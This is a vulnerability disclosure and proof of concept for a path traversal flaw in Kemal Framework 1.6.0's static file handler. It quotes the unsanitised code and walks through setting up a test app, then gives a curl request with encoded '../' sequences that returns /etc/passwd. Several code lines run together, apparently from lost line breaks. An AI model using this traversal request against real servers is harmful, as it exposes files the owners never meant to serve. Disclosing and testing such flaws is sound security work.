Exploit Title: Kemal Framework 1.6.0 - Path Traversal
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 04.04.2025
Vendor Homepage: https://github.com/kemalcr
Software Link: https://github.com/kemalcr/kemal/archive/refs/tags/v1.6.0.zip
Tested Version: v1.6.0 (latest)
Tested on: Kali Linux
CVE: (Waiting for response)

🧩 Summary
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-summary>

A *Path Traversal vulnerability* exists in the Kemal::StaticFileHandler
class of *Kemal Framework v1.6.0*. When serving static files from a
user-defined public directory, the framework fails to sanitize malicious ../
sequences in user-supplied URIs. This allows unauthenticated attackers to
access arbitrary files on the server.
🛠️ Affected Version
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#️-affected-version>

   - Kemal Framework v1.6.0

📌 Vulnerable Code
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-vulnerable-code>

In src/kemal/static_file_handler.cr:

request_path = URI.decode(original_path)
file_path = File.join(@public_dir, request_path)
if File.exists?(file_path)
  send_file(context, file_path)end

No checks are performed to sanitize or reject traversal sequences (../),
making it possible to access files outside the @public_dir.
🔥 Proof-of-Concept (PoC)
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-proof-of-concept-poc>
✅ 1. Create a New Kemal Project
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-1-create-a-new-kemal-project>

mkdir kemal-testcd kemal-test
crystal init app .

This command creates a sample Crystal application that includes a shard.yml
file.
------------------------------
✅ 2. Edit shard.yml File
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-2-edit-shardyml-file>

Edit the shard.yml file as follows:

name: kemal-testversion: 0.1.0
dependencies:
  kemal:
    github: kemalcr/kemal

------------------------------
✅ 3. Install the Required Packages
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-3-install-the-required-packages>

shards install

This command downloads and installs Kemal into the lib/ directory.
------------------------------
✅ 4. Edit src/kemal-test.cr File
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-4-edit-srckemal-testcr-file>

Write the following content:

require "kemal"

get "/" do
  "Hello from Kemal!"end
Kemal.config.public_folder = "./public"Kemal.run

------------------------------
✅ 5. Create public/ directory
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-5-create-public-directory>

mkdir public

------------------------------
✅ 6. Start the Application
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-6-start-the-application>

crystal run src/kemal-test.cr

Go to the following address in your browser:

http://localhost:3000

If you see "Hello from Kemal!", everything is working perfectly 🚀
------------------------------
✅ 7. Test the Vulnerability
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-7-test-the-vulnerability>

curl "http://localhost:3000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

If successful, the contents of /etc/passwd will be returned as shown below:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...